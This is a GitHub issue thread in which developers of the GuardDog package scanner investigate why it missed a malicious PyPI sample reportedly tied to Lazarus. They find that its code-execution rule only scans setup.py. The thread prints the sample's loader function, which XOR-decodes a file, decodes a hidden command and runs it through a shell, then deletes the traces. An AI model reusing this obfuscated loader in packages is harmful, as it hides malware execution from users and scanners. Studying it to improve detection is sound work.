New pypi exploits #311

jxdv · 2024-02-29T15:14:52Z

Sources:
https://thehackernews.com/2024/02/lazarus-exploits-typos-to-sneak-pypi.html
https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html

Ran guarddog on this locally zipped code and got 0 malicious indicators

def crypt(filepath, key, strKey, no):
    inputFilePath = os.path.join(filepath, 'test.py')
    outputFilePath = os.path.join(filepath, 'output.py')
    command = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'
    if os.path.isfile(inputFilePath):
        with open(inputFilePath, "rb") as f1:
            with open(outputFilePath, "wb") as f3:
                while True:
                    byte = f1.read(1)
                    if not byte:
                        break  # End of file

                    # Perform XOR encryption
                    encrypted_byte = ord(byte) ^ key

                    # Write the encrypted byte to output file
                    f3.write(bytes([encrypted_byte]))
        result_bytes = bytes([byte ^ strKey for byte in command])
        result_string = result_bytes.decode('utf-8')
        strcommand = result_string + " " + outputFilePath + ", CalculateSum" + str(no)
        try:
            subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            os.remove(inputFilePath)
        except:
            pass
    if os.path.isfile(outputFilePath):
        os.remove(outputFilePath)

cedricvanrompay-datadog · 2024-03-05T10:50:16Z

Weird, the subprocess.run should have been caught by

guarddog/guarddog/analyzer/sourcecode/code-execution.yml

Line 39 in e49bf32

- pattern: subprocess.run($ARG1, ...)

cedricvanrompay-datadog · 2024-03-05T10:59:28Z

I can reproduce the false negative:

$  pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

cedricvanrompay-datadog · 2024-03-05T11:03:33Z

And I can confirm that my reproduction method (putting the Python file in a ZIP and scanning the ZIP) is supposed to work:

$ zip -r ~/tinkering/guarddog-samples/code-execution.zip tests/analyzer/sourcecode/code-execution.py
  adding: tests/analyzer/sourcecode/code-execution.py (deflated 60%)
$ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/code-execution.zip
Found 16 potentially malicious indicators in /Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.zip

code-execution: found 14 source code matches
[...]

cedricvanrompay-datadog · 2024-03-05T11:38:24Z

However, it seems that semgrep alone does find the code execution (at line 221 in my example):

➜  guarddog git:(main) ✗ git diff tests/analyzer/sourcecode/code-execution.py
diff --git a/tests/analyzer/sourcecode/code-execution.py b/tests/analyzer/sourcecode/code-execution.py
index 1db1bd4..5956b5c 100644
--- a/tests/analyzer/sourcecode/code-execution.py
+++ b/tests/analyzer/sourcecode/code-execution.py
@@ -196,3 +196,31 @@ def run_file(path):
     # ruleid: code-execution
        p = subprocess.Popen(f"python {path}",shell=True,stdin=None,stdout=subprocess.PIPE,stderr=subprocess.PIPE,close_fds=True)
        out, err = p.communicate()
+
+def crypt(filepath, key, strKey, no):
+    inputFilePath = os.path.join(filepath, 'test.py')
+    outputFilePath = os.path.join(filepath, 'output.py')
+    command = b'\xae\xa9\xb2\xb8\xb0\xb0\xef\xee'
+    if os.path.isfile(inputFilePath):
+        with open(inputFilePath, "rb") as f1:
+            with open(outputFilePath, "wb") as f3:
+                while True:
+                    byte = f1.read(1)
+                    if not byte:
+                        break  # End of file
+
+                    # Perform XOR encryption
+                    encrypted_byte = ord(byte) ^ key
+
+                    # Write the encrypted byte to output file
+                    f3.write(bytes([encrypted_byte]))
+        result_bytes = bytes([byte ^ strKey for byte in command])
+        result_string = result_bytes.decode('utf-8')
+        strcommand = result_string + " " + outputFilePath + ", CalculateSum" + str(no)
+        try:
+            subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
+            os.remove(inputFilePath)
+        except:
+            pass
+    if os.path.isfile(outputFilePath):
+        os.remove(outputFilePath)
➜  guarddog git:(main) ✗ pipenv run semgrep --metrics off --test --config guarddog/analyzer/sourcecode/code-execution.yml tests/analyzer/sourcecode/code-execution.py
0/1: 1 unit tests did not pass:
--------------------------------------------------------------------------------
	✖ code-execution                                               missed lines: [], incorrect lines: [221]
	test file path: /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/tests/analyzer/sourcecode/code-execution.py


No tests for fixes found.

cedricvanrompay-datadog · 2024-03-05T11:49:22Z

Wait, that's weird, guarddog does report findings depending on the filename I use in the ZIP archive:

➜  guarddog git:(main) ✗ # both files are the same
➜  guarddog git:(main) ✗ diff ~/tinkering/guarddog-samples/code-execution.py ~/tinkering/guarddog-samples/sample.py
➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/sample.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/sample.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/code-execution.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog pypi scan ~/tinkering/guarddog-samples/sample.zip
Found 1 potentially malicious indicators in /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

code-execution: found 1 source code matches
  * This package is executing OS commands in the setup.py file at Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py/Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py:25
        subprocess.run(strcommand, shell=True, check=True, text=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)

It seems to ignore the file if it is named sample.py in the ZIP archive.

cedricvanrompay-datadog · 2024-03-05T11:59:53Z

Well it seems like GuardDog does have a list of files it will not scan with SemGrep:

guarddog/guarddog/analyzer/analyzer.py

Line 50 in e49bf32

self.exclude = [

However, sample.py shoud not match any of them, that's weird.

cedricvanrompay-datadog · 2024-03-05T12:03:53Z

Well running guarddog with an empty self.exclude does not change the problem.

cedricvanrompay-datadog · 2024-03-05T12:14:52Z

foo.py gets ignored just like sample.py

➜  guarddog git:(main) ✗ sha256sum ~/tinkering/guarddog-samples/foo.py ~/tinkering/guarddog-samples/sample.py ~/tinkering/guarddog-samples/code-execution.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.py
f3aef3a08a45e4a26a3c47d21aca72b99e1ea65fb96b7c5cdd986ceee948a81f  /Users/cedric.vanrompay/tinkering/guarddog-samples/code-execution.py
➜  guarddog git:(main) ✗ rm ~/tinkering/guarddog-samples/sample.zip; zip -r ~/tinkering/guarddog-samples/sample.zip ~/tinkering/guarddog-samples/foo.py
  adding: Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py (deflated 61%)
➜  guarddog git:(main) ✗ pipenv run python -m guarddog --log-level=DEBUG pypi scan ~/tinkering/guarddog-samples/sample.zip
DEBUG: Considering that '/Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip' is a local target, scanning filesystem
DEBUG: Extracting archive /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip to directory /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
DEBUG: content of /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd: ['/var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py', '/var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py/Users/cedric.vanrompay/tinkering/guarddog-samples/foo.py']
DEBUG: No rules specified using full rules directory /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/guarddog/analyzer/sourcecode
DEBUG: Running source code rules against /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
DEBUG: Invoking semgrep with command line: semgrep --config /Users/cedric.vanrompay/go/src/github.com/DataDog/guarddog/guarddog/analyzer/sourcecode --no-git-ignore --json --quiet /var/folders/mr/gw__5v_16b5g3kl00czl2d800000gq/T/tmpbjoihbzd
Found 0 potentially malicious indicators scanning /Users/cedric.vanrompay/tinkering/guarddog-samples/sample.zip

So the problem seems to be that semgrep every single file unless if its named code-execution.py?

According to https://semgrep.dev/docs/writing-rules/testing-rules/:

Semgrep looks for tests based on the rule filename and the languages specified in the rule. In other words, path/to/rule.yaml searches for path/to/rule.py, path/to/rule.js and similar, based on the languages specified in the rule.

But this is just supposed to be for testing, right?

cedricvanrompay-datadog · 2024-03-05T12:16:00Z

Ah, found it! It's not a bug it's a feature ™️

guarddog/guarddog/analyzer/sourcecode/code-execution.yml

Line 1 in e49bf32

# Only searches in setup.py to reduce false positives!

guarddog/guarddog/analyzer/sourcecode/code-execution.yml

Lines 113 to 116 in e49bf32

    
           paths: 
        
             include: 
        
               - "*/setup.py" 
        
               - "*/code-execution.py"

cedricvanrompay-datadog · 2024-03-05T12:18:14Z

So, the conclusion is:

GuardDog is able to detect this code execution
currently it only scans setup.py for this rule
this would have missed the malicioius packages in https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html since the code execution was in __init__.py in this case

christophetd · 2024-04-03T13:22:58Z

closing in favor of #312 as discussed with @cedricvanrompay-datadog

This was referenced Mar 5, 2024

Identify new malicious pypi packages #306

Closed

GuardDog Only Scans "setup.py" For Code Execution #312

Open

christophetd added the false-negative label Mar 5, 2024

christophetd closed this as completed Apr 3, 2024

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

New pypi exploits #311

New pypi exploits #311

jxdv commented Feb 29, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

christophetd commented Apr 3, 2024

New pypi exploits #311

New pypi exploits #311

Comments

jxdv commented Feb 29, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

cedricvanrompay-datadog commented Mar 5, 2024

christophetd commented Apr 3, 2024